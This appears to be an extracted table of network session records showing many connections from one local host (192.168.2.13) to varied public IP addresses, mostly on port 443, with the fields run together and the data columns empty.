                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13721192.168.2.1354680202.19.238.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13722192.168.2.1355720221.159.116.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13723192.168.2.1342716208.160.12.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13724192.168.2.135359065.23.37.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13725192.168.2.1352612199.198.82.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13726192.168.2.1347904141.147.226.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13727192.168.2.1360348163.231.45.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13728192.168.2.1360512139.49.203.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13729192.168.2.133337613.137.187.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13730192.168.2.133712658.52.104.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13731192.168.2.1355392153.139.48.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13732192.168.2.1352814138.99.124.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13733192.168.2.134653223.50.126.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13734192.168.2.134175268.231.155.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13735192.168.2.1338888218.31.240.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13736192.168.2.1340044159.3.78.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13737192.168.2.1349624187.78.39.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13738192.168.2.1350368207.190.243.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13739192.168.2.1333100212.196.2.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13740192.168.2.1352724147.200.224.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13741192.168.2.1341856193.207.93.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13742192.168.2.134873418.82.144.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13743192.168.2.1352464155.78.111.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13744192.168.2.1344164125.195.85.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13745192.168.2.133639632.117.196.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13746192.168.2.1339764110.156.20.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13747192.168.2.1349922139.66.236.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13748192.168.2.1345178106.102.180.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13749192.168.2.1342070199.78.173.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13750192.168.2.1360090199.151.4.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13751192.168.2.1344090140.136.99.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13752192.168.2.1346214144.242.54.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13753192.168.2.1348722123.54.10.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13754192.168.2.1360792221.150.89.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13755192.168.2.133743632.86.180.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13756192.168.2.134979631.114.147.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13757192.168.2.1338218150.106.49.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13758192.168.2.134728223.166.76.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13759192.168.2.134032467.77.146.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13760192.168.2.135020279.118.151.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13761192.168.2.1358960176.210.154.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13762192.168.2.133394238.243.150.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13763192.168.2.1340824139.243.28.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13764192.168.2.1343992134.146.44.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13765192.168.2.13443089.114.24.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13766192.168.2.134723486.228.87.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13767192.168.2.1343562167.177.208.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13768192.168.2.1356262200.95.251.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13769192.168.2.133968225.217.116.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13770192.168.2.135390068.139.16.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13771192.168.2.1345680100.174.12.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13772192.168.2.1340532125.247.134.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13773192.168.2.1337284162.183.57.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13774192.168.2.134074875.36.195.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13775192.168.2.133566059.115.2.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13776192.168.2.1343776179.253.7.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13777192.168.2.1339266115.202.212.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13778192.168.2.1347384169.84.200.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13779192.168.2.1356704193.221.198.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13780192.168.2.1344750135.207.86.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13781192.168.2.1353804220.38.53.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13782192.168.2.135688838.45.89.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13783192.168.2.13587582.250.9.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13784192.168.2.1347850148.114.155.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13785192.168.2.1360136117.16.188.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13786192.168.2.133980075.108.135.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13787192.168.2.1352718206.253.73.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13788192.168.2.134119042.20.198.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13789192.168.2.1345688129.153.25.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13790192.168.2.133538234.16.59.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13791192.168.2.135763653.106.53.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13792192.168.2.133957476.151.99.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13793192.168.2.1346366212.66.104.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13794192.168.2.1333616117.105.253.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13795192.168.2.133806479.150.85.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13796192.168.2.1351634136.136.248.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13797192.168.2.1336802124.54.45.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13798192.168.2.1343188194.160.241.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13799192.168.2.1341966204.71.253.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13800192.168.2.134474623.80.50.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13801192.168.2.133981689.96.198.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13802192.168.2.134521614.109.214.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13803192.168.2.1353880190.102.84.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13804192.168.2.1340408143.48.30.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13805192.168.2.13370384.126.63.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13806192.168.2.1335404123.83.76.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13807192.168.2.1358918124.15.100.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13808192.168.2.135441478.178.149.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13809192.168.2.1357878153.207.71.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13810192.168.2.1343802163.129.191.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13811192.168.2.134187469.47.78.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13812192.168.2.134455618.199.141.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13813192.168.2.1343314116.161.155.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13814192.168.2.134876095.34.14.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13815192.168.2.1343000135.79.49.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13816192.168.2.134889437.39.67.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13817192.168.2.1340002206.248.188.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13818192.168.2.1338032107.114.182.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13819192.168.2.133493060.94.206.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13820192.168.2.1341222166.243.57.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13821192.168.2.1355080166.18.161.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13822192.168.2.1344458119.60.236.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13823192.168.2.1354158124.92.44.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13824192.168.2.1355714160.254.70.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13825192.168.2.1333778164.120.7.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13826192.168.2.1358572116.68.14.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13827192.168.2.1350924170.99.98.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13828192.168.2.134552097.211.232.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13829192.168.2.1347950165.166.29.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13830192.168.2.1338812167.3.100.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13831192.168.2.134547665.7.89.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13832192.168.2.135066838.54.195.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13833192.168.2.134964296.185.230.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13834192.168.2.1352794106.96.146.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13835192.168.2.135011451.128.128.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13836192.168.2.1356314165.114.74.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13837192.168.2.1357012132.122.224.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13838192.168.2.134743278.0.43.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13839192.168.2.1342850186.200.94.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13840192.168.2.1355538105.147.204.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13841192.168.2.1348212105.108.190.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13842192.168.2.1359762148.20.193.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13843192.168.2.135383251.135.17.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13844192.168.2.1336088211.107.164.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13845192.168.2.1340832171.130.235.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13846192.168.2.1355076202.153.95.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13847192.168.2.134478493.189.155.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13848192.168.2.1342630140.197.176.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13849192.168.2.135844273.247.32.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13850192.168.2.1342978124.54.49.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13851192.168.2.1344780135.164.203.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13852192.168.2.1345164218.116.24.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13853192.168.2.1342090160.121.185.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13854192.168.2.1358702223.30.142.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13855192.168.2.134755070.187.89.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13856192.168.2.1333900167.59.122.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13857192.168.2.133503869.234.133.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13858192.168.2.135333680.254.250.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13859192.168.2.135886878.252.152.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13860192.168.2.134026046.116.189.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13861192.168.2.1348574104.126.161.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13862192.168.2.1344610165.41.208.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13863192.168.2.135994065.158.173.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13864192.168.2.1334760179.84.84.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13865192.168.2.135593074.230.201.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13866192.168.2.133455844.59.146.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13867192.168.2.1347708157.103.231.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13868192.168.2.134050443.78.249.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13869192.168.2.133382846.157.51.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13870192.168.2.135209031.135.227.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13871192.168.2.1335866197.64.97.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13872192.168.2.133324813.83.155.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13873192.168.2.1359466147.46.246.1318080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13874192.168.2.1348098109.226.18.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13875192.168.2.1348478151.127.145.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13876192.168.2.1335538148.181.52.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13877192.168.2.135981447.35.125.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13878192.168.2.135618212.54.71.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13879192.168.2.1347266168.158.167.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13880192.168.2.1350678161.168.144.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13881192.168.2.1339896189.145.71.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13882192.168.2.1347290204.225.244.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13883192.168.2.135352814.79.160.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13884192.168.2.1333124119.120.247.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13885192.168.2.1360466222.105.117.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13886192.168.2.1343688175.27.74.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13887192.168.2.135374443.186.102.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13888192.168.2.1358120132.213.124.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13889192.168.2.1346514201.85.230.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13890192.168.2.133505034.174.171.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13891192.168.2.13366728.116.34.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13892192.168.2.1348910139.52.141.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13893192.168.2.135238258.28.213.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13894192.168.2.1350420147.222.124.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13895192.168.2.1353584175.246.164.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13896192.168.2.135664032.1.66.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13897192.168.2.1333830177.52.152.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13898192.168.2.1344552138.103.137.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13899192.168.2.1353020133.16.52.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13900192.168.2.1337916144.103.121.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13901192.168.2.1336960168.207.173.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13902192.168.2.1335994190.64.50.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13903192.168.2.1353880137.252.159.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13904192.168.2.1336916109.33.233.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13905192.168.2.1352560141.224.31.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13906192.168.2.1357214135.123.241.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13907192.168.2.133451095.160.116.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13908192.168.2.134075243.209.54.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13909192.168.2.1346464173.171.88.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13910192.168.2.1348560188.32.141.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13911192.168.2.133516066.1.112.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13912192.168.2.134768632.188.152.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13913192.168.2.134378662.28.40.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13914192.168.2.1344832217.248.103.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13915192.168.2.1341584174.115.206.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13916192.168.2.1353156139.38.45.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13917192.168.2.1356684113.32.122.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13918192.168.2.1350152195.1.15.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13919192.168.2.1333904168.74.235.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13920192.168.2.134436873.62.248.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13921192.168.2.1346370166.145.29.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13922192.168.2.13604265.130.57.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13923192.168.2.1334102211.20.190.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13924192.168.2.1332964124.178.204.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13925192.168.2.1346834109.54.198.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13926192.168.2.133476479.61.68.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13927192.168.2.133353235.23.65.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13928192.168.2.135470887.93.75.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13929192.168.2.134331840.202.114.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13930192.168.2.1352162190.200.205.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13931192.168.2.1349136130.182.202.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13932192.168.2.1346526218.236.9.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13933192.168.2.1341274130.1.48.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13934192.168.2.13372045.237.58.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13935192.168.2.135364469.109.174.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13936192.168.2.1346470125.103.96.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13937192.168.2.1335284200.45.56.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13938192.168.2.135155472.188.184.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13939192.168.2.1354522140.175.226.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13940192.168.2.1341462116.69.183.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13941192.168.2.1353282195.139.48.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13942192.168.2.133292031.43.27.226443
